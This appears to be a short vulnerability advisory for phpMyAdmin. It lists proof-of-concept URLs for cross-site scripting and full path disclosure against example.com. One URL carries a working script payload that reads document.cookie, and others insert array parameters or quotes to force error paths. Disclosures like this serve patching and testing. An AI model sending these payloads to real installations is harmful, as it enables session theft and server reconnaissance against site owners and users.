Cross-site scripting:

http://www.example.com/phpmyadmin/db_create.php?token=your_token&reload=1&db=[double xss(2 followed xss)]
http://www.example.com/phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]
http://www.example.com/phpmyadmin/querywindow.php?token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]
http://www.example.com/phpmyadmin/sql.php?db=information_schema&token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=</textarea>'"><script>alert(document.cookie)</script>

Full path disclosure:

http://www.example.com/scripts/check_lang.php
http://www.example.com/themes/darkblue_orange/layout.inc.php
http://www.example.com/index.php?lang[]=
http://www.example.com/index.php?target[]=
http://www.example.com/index.php?db[]=
http://www.example.com/index.php?goto[]=
http://www.example.com/left.php?server[]=
http://www.example.com/index.php?table[]=
http://www.example.com/server_databases.php?token=your_token&sort_by="
http://www.example.com/index.php?db=information_schema&token=your_token&tbl_group[]=
http://www.example.com/db_printview.php?db="
http://www.example.com/sql.php?back[]=